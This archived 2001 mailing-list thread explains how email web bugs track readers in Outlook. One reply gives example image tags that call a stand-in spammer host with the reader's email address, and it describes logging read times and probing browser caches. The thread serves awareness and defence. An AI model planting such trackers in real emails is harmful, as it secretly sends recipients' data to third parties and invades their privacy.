Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Email webbugs

From: "Mariano Vassallo" <anakin () edunexo com>
Date: Tue, 28 Aug 2001 15:13:36 -0300
afaik, webbugs work like this:
Spammer X sends you an HTML mail with an invisible image from his site
 <img src=http://www.weluvspam.com/bug.gif height=1 whidth=1> )
When you read this email in Outlook, the image (bug.gif) is downloaded from
the spammers site.
If the image is generated by a CGI script he can log the time you read your
mail, and validate your address.
 for example, instead of bug.gif, he could use a script to create the image:
    <img
src=http://www.weluvspam.com/createimage.php?mail=youremail () yourdomain com >
    the script (createimage.php) could :
        save the "mail=youremail () yourdomain com" parameter to a database of
valid email addresses
        save the time of the day you checked your mail (combined with the
time the email was sent - taken from a database- it can be used to know how
often a person checks his mail, and at what time)
        determine wheter you visited a certain website recently (timming how
long it takes to load an image from that website. if it loads inmediatly,
then you probably have it in your browsers cache)

Mariano

----- Original Message -----
From: "Dom De Vitto" <Dom () DeVitto com>
To: "Peter Pekala" <peterp () netnitco net>; "abuse" <postmaster () getinfo org>;
"Focus-MS" <focus-ms () securityfocus com>
Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEV () securityfocus com>;
"BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQ () securityfocus com>;
<win2ksecadvice () listserv ntsecurity net>
Sent: Tuesday, August 28, 2001 5:42 AM
Subject: RE: Email webbugs



Webbugs are NOT return receipts!!
Everybody should *at least* have return-receipts set to 'prompt'.
That is a no-brainer.
Web bugs are totally different, and can divulg a lot more information -
especially when tallied with cross-host information.

Dom
-----Original Message-----
From: Peter Pekala [mailto:peterp () netnitco net]
Sent: 27 August 2001 17:11
To: abuse; Focus-MS
Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM;
win2ksecadvice () listserv ntsecurity net
Subject: Re: Email webbugs


In Outlook Express - Have you tried configuring this through Tools -
Options - Receipts - Returning Read Receipts ?

- Peter


: One of the things that has always bothered me about Outlook Express and
: Outlook is that they are susceptable to webbugs. Basically there are no
: options to block confirmation of your reading an email so any spammer

can

: verify that your address is active as long as they can get you to just
view
: an email.
:
: A lot of people have difficulty understanding exactly what this means so

I

: set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an
: attempt to raise awareness of this nonsense and get MS to do something
about
: it. I don't know if other email programs like Eudora and Netscape are
: vulnerable to email webbugs so if anyone tests those please let me know
the
: results.
:
: Anyway, I've made the test site available to the public now so if you

want

: to check your email reader, feel free.
:
: Geo.
:








---------------------------------------------
Servicio provisto por EDUNEXO
---------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: